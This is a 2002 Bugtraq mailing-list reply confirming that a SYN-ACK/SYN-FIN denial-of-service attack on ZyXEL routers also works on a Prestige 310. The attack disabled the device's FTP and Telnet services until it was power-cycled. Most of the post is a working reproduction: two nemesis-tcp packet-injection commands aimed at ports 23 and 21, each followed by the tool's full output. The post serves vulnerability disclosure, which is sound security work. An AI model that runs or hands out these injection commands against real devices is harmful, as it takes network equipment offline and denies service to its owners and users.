[25931] in bugtraq
RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS
daemon@ATHENA.MIT.EDU (Christopher Gripp)
Tue Jun 25 08:07:31 2002
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Date: Mon, 24 Jun 2002 10:11:15 -0700
Message-ID: <4EBB5C35607E7F48B4AE162D956666EFF6EFAB@guam.corp.axcelerant.com>
From: "Christopher Gripp" <cgripp@axcelerant.com>
To: "Bugtraq" <Bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit
I have verified this same DoS attack is viable on a Prestige 310 running an OEM version of code written specifically for my company. I successfully DoS'd both the FTP and Telnet services. Below are the nemesis commands used. The services remained in an unreachable state until a powercycle was performed.
[root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 23
TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian@packetninja.net>
Portions copyright (C) 2001 Jeff Nathan <jeff@wwti.com>
[IP] [SRC IP] > [DST IP]
[Ports] 42069 > 23
[Flags] SYN ACK
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options]
Wrote 40 bytes
TCP Packet Injected
[root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 21
TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian@packetninja.net>
Portions copyright (C) 2001 Jeff Nathan <jeff@wwti.com>
[IP] [SRC IP] > [DST IP]
[Ports] 42069 > 21
[Flags] SYN ACK
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options]
Wrote 40 bytes
TCP Packet Injected
Christopher Gripp
Systems Engineer
Axcelerant
